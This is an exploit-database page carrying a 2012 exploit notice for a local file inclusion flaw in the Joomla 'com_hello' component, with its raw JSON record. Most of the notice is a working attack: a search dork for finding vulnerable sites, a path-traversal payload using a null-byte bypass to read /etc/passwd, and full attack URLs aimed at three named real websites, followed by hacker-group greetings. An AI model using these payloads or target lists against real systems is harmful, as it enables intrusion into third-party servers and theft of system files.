Search...

Joomla Hello component suffers from a local file inclusion vulnerability.

2012-07-22T00:00:00

ID SSV:60289
Type seebug
Reporter Root
Modified 2012-07-22T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ##################################################################################
#   Title : Joomla Component com_hello Local File Include
#
#   Author : Ajax Security Team
#
#   Discovered By : devilzc0der &amp; Dominator
#
#   Dork : inurl:&quot;com_hello&quot;
#
#   h0m3 : www.ajaxtm.com
#
#   Software Link : www.joomla.com
#
#   Level : High
##################################################################################
#  p0c :
#                com_hello&amp;controller=../../../../../../../../etc/passwd%00
#
# Please Use Null Byte ( %00 ) for Bypas .
##################################################################################
# 3xample :
#
#
http://golden-bird.ru/index.php?option=com_hello&amp;controller=../../../../../../../../etc/passwd%00
#
#
http://etm-proekt.ru/index.php?option=com_hello&amp;controller=../../../../../../../../etc/passwd%00
#
#
http://a2-svz.ru/index.php?option=com_hello&amp;controller=../../../../../../../../etc/passwd%00
###################################################################################
# Special TNX t0 : Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion
- Daniyal
###################################################################################
# GreetZ : black.shadowes - hadihadi - irsdl - Mormoroth - B@RBOD &amp; All
Iranian HackerZ
###################################################################################

JSON Vulners Source

Initial Source

{"sourceData": "\n ##################################################################################\r\n# Title : Joomla Component com_hello Local File Include\r\n#\r\n# Author : Ajax Security Team\r\n#\r\n# Discovered By : devilzc0der & Dominator\r\n#\r\n# Dork : inurl:"com_hello"\r\n#\r\n# h0m3 : www.ajaxtm.com\r\n#\r\n# Software Link : www.joomla.com\r\n#\r\n# Level : High\r\n##################################################################################\r\n# p0c :\r\n# com_hello&controller=../../../../../../../../etc/passwd%00\r\n#\r\n# Please Use Null Byte ( %00 ) for Bypas .\r\n##################################################################################\r\n# 3xample :\r\n#\r\n#\r\nhttp://golden-bird.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00\r\n#\r\n#\r\nhttp://etm-proekt.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00\r\n#\r\n#\r\nhttp://a2-svz.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00\r\n###################################################################################\r\n# Special TNX t0 : Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion\r\n- Daniyal\r\n###################################################################################\r\n# GreetZ : black.shadowes - hadihadi - irsdl - Mormoroth - B@RBOD & All\r\nIranian HackerZ\r\n###################################################################################\n ", "status": "poc", "history": [], "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-60289", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-60289", "type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "viewCount": 2, "references": [], "lastseen": "2017-11-19T17:50:23", "published": "2012-07-22T00:00:00", "objectVersion": "1.4", "cvelist": [], "id": "SSV:60289", "enchantments_done": [], "modified": "2012-07-22T00:00:00", "title": "Joomla Hello component suffers from a local file inclusion vulnerability.", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"vector": "NONE", "value": 9.3}, "dependencies": {"references": [], "modified": "2017-11-19T17:50:23"}, "vulnersScore": 9.3}, "_object_type": "robots.models.seebug.SeebugBulletin"}